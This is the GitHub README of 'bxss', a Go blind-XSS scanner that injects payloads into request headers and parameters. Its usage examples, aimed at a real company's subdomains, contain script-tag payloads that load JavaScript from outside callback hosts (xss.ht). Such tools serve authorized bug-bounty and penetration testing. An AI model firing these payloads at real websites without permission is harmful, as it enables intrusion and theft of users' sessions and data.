Skip to content

Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.

License

Notifications You must be signed in to change notification settings

ethicalhackingplayground/bxss

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation


Bxss

Bxss - Blind XSS Scanner

Version License: MIT Go Report Card Go Reference

Description

Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.


Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses Different Request Methods (PUT,POST,GET,OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to setup

Install

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

Arguments

Argument Description Default
-appendMode Append the payload to the parameter
-concurrency int Set the concurrency 30
-header string Set the custom header "User-Agent"
-headerFile string Path to file containing headers to test
-parameters Test the parameters for blind xss
-payload string The blind XSS payload
-payloadFile string Path to file containing payloads to test

Demonstration

asciicast


Blind XSS In Parameters

subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS In X-Forwarded-For Header

subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"

If you get a bounty please support by buying me a coffee


Buy Me A Coffee

About

Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages